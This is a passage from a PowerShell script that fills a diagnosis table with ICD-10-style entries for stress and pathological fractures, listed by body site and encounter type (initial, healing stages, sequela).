$DiagnosisList.Rows.Add("Stress fracture, right ulna","Stress fracture, right ulna, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right ulna","Stress fracture, right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, left ulna","Stress fracture, left ulna, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, left ulna","Stress fracture, left ulna, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left ulna","Stress fracture, left ulna, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left ulna","Stress fracture, left ulna, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left ulna","Stress fracture, left ulna, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left ulna","Stress fracture, left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, right radius","Stress fracture, right radius, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, right radius","Stress fracture, right radius, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right radius","Stress fracture, right radius, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right radius","Stress fracture, right radius, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right radius","Stress fracture, right radius, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right radius","Stress fracture, right radius, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, left radius","Stress fracture, left radius, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, left radius","Stress fracture, left radius, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left radius","Stress fracture, left radius, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left radius","Stress fracture, left radius, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left radius","Stress fracture, left radius, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left radius","Stress fracture, left radius, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified ulna and radius","Stress fracture, unspecified ulna and radius, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified ulna and radius","Stress fracture, unspecified ulna and radius, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified ulna and radius","Stress fracture, unspecified ulna and radius, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified ulna and radius","Stress fracture, unspecified ulna and radius, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified ulna and radius","Stress fracture, unspecified ulna and radius, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified ulna and radius","Stress fracture, unspecified ulna and radius, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, right hand","Stress fracture, right hand, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, right hand","Stress fracture, right hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right hand","Stress fracture, right hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right hand","Stress fracture, right hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right hand","Stress fracture, right hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right hand","Stress fracture, right hand, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, left hand","Stress fracture, left hand, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, left hand","Stress fracture, left hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left hand","Stress fracture, left hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left hand","Stress fracture, left hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left hand","Stress fracture, left hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left hand","Stress fracture, left hand, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified hand","Stress fracture, unspecified hand, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified hand","Stress fracture, unspecified hand, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified hand","Stress fracture, unspecified hand, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified hand","Stress fracture, unspecified hand, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified hand","Stress fracture, unspecified hand, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified hand","Stress fracture, unspecified hand, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, right finger(s)","Stress fracture, right finger(s), initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, right finger(s)","Stress fracture, right finger(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right finger(s)","Stress fracture, right finger(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right finger(s)","Stress fracture, right finger(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right finger(s)","Stress fracture, right finger(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right finger(s)","Stress fracture, right finger(s), sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, left finger(s)","Stress fracture, left finger(s), initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, left finger(s)","Stress fracture, left finger(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left finger(s)","Stress fracture, left finger(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left finger(s)","Stress fracture, left finger(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left finger(s)","Stress fracture, left finger(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left finger(s)","Stress fracture, left finger(s), sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified finger(s)","Stress fracture, unspecified finger(s), initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified finger(s)","Stress fracture, unspecified finger(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified finger(s)","Stress fracture, unspecified finger(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified finger(s)","Stress fracture, unspecified finger(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified finger(s)","Stress fracture, unspecified finger(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified finger(s)","Stress fracture, unspecified finger(s), sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, pelvis","Stress fracture, pelvis, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, pelvis","Stress fracture, pelvis, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, pelvis","Stress fracture, pelvis, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, pelvis","Stress fracture, pelvis, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, pelvis","Stress fracture, pelvis, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, pelvis","Stress fracture, pelvis, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, right femur","Stress fracture, right femur, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, right femur","Stress fracture, right femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right femur","Stress fracture, right femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right femur","Stress fracture, right femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right femur","Stress fracture, right femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right femur","Stress fracture, right femur, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, left femur","Stress fracture, left femur, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, left femur","Stress fracture, left femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left femur","Stress fracture, left femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left femur","Stress fracture, left femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left femur","Stress fracture, left femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left femur","Stress fracture, left femur, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified femur","Stress fracture, unspecified femur, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified femur","Stress fracture, unspecified femur, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified femur","Stress fracture, unspecified femur, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified femur","Stress fracture, unspecified femur, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified femur","Stress fracture, unspecified femur, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified femur","Stress fracture, unspecified femur, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, hip, unspecified","Stress fracture, hip, unspecified, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, hip, unspecified","Stress fracture, hip, unspecified, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, hip, unspecified","Stress fracture, hip, unspecified, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, hip, unspecified","Stress fracture, hip, unspecified, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, hip, unspecified","Stress fracture, hip, unspecified, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, hip, unspecified","Stress fracture, hip, unspecified, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, right tibia","Stress fracture, right tibia, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, right tibia","Stress fracture, right tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right tibia","Stress fracture, right tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right tibia","Stress fracture, right tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right tibia","Stress fracture, right tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right tibia","Stress fracture, right tibia, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, left tibia","Stress fracture, left tibia, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, left tibia","Stress fracture, left tibia, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left tibia","Stress fracture, left tibia, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left tibia","Stress fracture, left tibia, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left tibia","Stress fracture, left tibia, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left tibia","Stress fracture, left tibia, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, right fibula","Stress fracture, right fibula, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, right fibula","Stress fracture, right fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right fibula","Stress fracture, right fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right fibula","Stress fracture, right fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right fibula","Stress fracture, right fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right fibula","Stress fracture, right fibula, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, left fibula","Stress fracture, left fibula, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, left fibula","Stress fracture, left fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left fibula","Stress fracture, left fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left fibula","Stress fracture, left fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left fibula","Stress fracture, left fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left fibula","Stress fracture, left fibula, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified tibia and fibula","Stress fracture, unspecified tibia and fibula, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified tibia and fibula","Stress fracture, unspecified tibia and fibula, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified tibia and fibula","Stress fracture, unspecified tibia and fibula, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified tibia and fibula","Stress fracture, unspecified tibia and fibula, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified tibia and fibula","Stress fracture, unspecified tibia and fibula, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified tibia and fibula","Stress fracture, unspecified tibia and fibula, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, right ankle","Stress fracture, right ankle, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, right ankle","Stress fracture, right ankle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right ankle","Stress fracture, right ankle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right ankle","Stress fracture, right ankle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right ankle","Stress fracture, right ankle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right ankle","Stress fracture, right ankle, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, left ankle","Stress fracture, left ankle, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, left ankle","Stress fracture, left ankle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left ankle","Stress fracture, left ankle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left ankle","Stress fracture, left ankle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left ankle","Stress fracture, left ankle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left ankle","Stress fracture, left ankle, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified ankle","Stress fracture, unspecified ankle, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified ankle","Stress fracture, unspecified ankle, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified ankle","Stress fracture, unspecified ankle, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified ankle","Stress fracture, unspecified ankle, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified ankle","Stress fracture, unspecified ankle, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified ankle","Stress fracture, unspecified ankle, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, right foot","Stress fracture, right foot, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, right foot","Stress fracture, right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right foot","Stress fracture, right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right foot","Stress fracture, right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right foot","Stress fracture, right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right foot","Stress fracture, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, left foot","Stress fracture, left foot, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, left foot","Stress fracture, left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left foot","Stress fracture, left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left foot","Stress fracture, left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left foot","Stress fracture, left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left foot","Stress fracture, left foot, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified foot","Stress fracture, unspecified foot, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified foot","Stress fracture, unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified foot","Stress fracture, unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified foot","Stress fracture, unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified foot","Stress fracture, unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified foot","Stress fracture, unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, right toe(s)","Stress fracture, right toe(s), initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, right toe(s)","Stress fracture, right toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right toe(s)","Stress fracture, right toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, right toe(s)","Stress fracture, right toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right toe(s)","Stress fracture, right toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, right toe(s)","Stress fracture, right toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, left toe(s)","Stress fracture, left toe(s), initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, left toe(s)","Stress fracture, left toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left toe(s)","Stress fracture, left toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, left toe(s)","Stress fracture, left toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left toe(s)","Stress fracture, left toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, left toe(s)","Stress fracture, left toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified toe(s)","Stress fracture, unspecified toe(s), initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified toe(s)","Stress fracture, unspecified toe(s), subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified toe(s)","Stress fracture, unspecified toe(s), subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified toe(s)","Stress fracture, unspecified toe(s), subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified toe(s)","Stress fracture, unspecified toe(s), subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, unspecified toe(s)","Stress fracture, unspecified toe(s), sequela") + $null = $DiagnosisList.Rows.Add("Stress fracture, other site","Stress fracture, other site, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Stress fracture, other site","Stress fracture, other site, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, other site","Stress fracture, other site, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Stress fracture, other site","Stress fracture, other site, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, other site","Stress fracture, other site, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Stress fracture, other site","Stress fracture, other site, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified site","Pathological fracture, unspecified site, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified site","Pathological fracture, unspecified site, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified site","Pathological fracture, unspecified site, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified site","Pathological fracture, unspecified site, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified site","Pathological fracture, unspecified site, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified site","Pathological fracture, unspecified site, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right shoulder","Pathological fracture, right shoulder, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right shoulder","Pathological fracture, right shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right shoulder","Pathological fracture, right shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right shoulder","Pathological fracture, right shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right shoulder","Pathological fracture, right shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right shoulder","Pathological fracture, right shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left shoulder","Pathological fracture, left shoulder, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left shoulder","Pathological fracture, left shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left shoulder","Pathological fracture, left shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left shoulder","Pathological fracture, left shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left shoulder","Pathological fracture, left shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left shoulder","Pathological fracture, left shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified shoulder","Pathological fracture, unspecified shoulder, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified shoulder","Pathological fracture, unspecified shoulder, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified shoulder","Pathological fracture, unspecified shoulder, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified shoulder","Pathological fracture, unspecified shoulder, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified shoulder","Pathological fracture, unspecified shoulder, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified shoulder","Pathological fracture, unspecified shoulder, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right humerus","Pathological fracture, right humerus, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right humerus","Pathological fracture, right humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right humerus","Pathological fracture, right humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right humerus","Pathological fracture, right humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right humerus","Pathological fracture, right humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right humerus","Pathological fracture, right humerus, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left humerus","Pathological fracture, left humerus, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left humerus","Pathological fracture, left humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left humerus","Pathological fracture, left humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left humerus","Pathological fracture, left humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left humerus","Pathological fracture, left humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left humerus","Pathological fracture, left humerus, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified humerus","Pathological fracture, unspecified humerus, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified humerus","Pathological fracture, unspecified humerus, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified humerus","Pathological fracture, unspecified humerus, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified humerus","Pathological fracture, unspecified humerus, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified humerus","Pathological fracture, unspecified humerus, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified humerus","Pathological fracture, unspecified humerus, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right ulna","Pathological fracture, right ulna, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right ulna","Pathological fracture, right ulna, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right ulna","Pathological fracture, right ulna, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right ulna","Pathological fracture, right ulna, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right ulna","Pathological fracture, right ulna, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right ulna","Pathological fracture, right ulna, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left ulna","Pathological fracture, left ulna, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left ulna","Pathological fracture, left ulna, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left ulna","Pathological fracture, left ulna, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left ulna","Pathological fracture, left ulna, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left ulna","Pathological fracture, left ulna, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left ulna","Pathological fracture, left ulna, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right radius","Pathological fracture, right radius, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right radius","Pathological fracture, right radius, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right radius","Pathological fracture, right radius, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right radius","Pathological fracture, right radius, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right radius","Pathological fracture, right radius, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, right radius","Pathological fracture, right radius, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left radius","Pathological fracture, left radius, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left radius","Pathological fracture, left radius, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left radius","Pathological fracture, left radius, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left radius","Pathological fracture, left radius, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left radius","Pathological fracture, left radius, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Pathological fracture, left radius","Pathological fracture, left radius, sequela") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified ulna and radius","Pathological fracture, unspecified ulna and radius, initial encounter for fracture") + $null = $DiagnosisList.Rows.Add("Pathological fracture, unspecified ulna and radius","Pathological fracture, unspecified 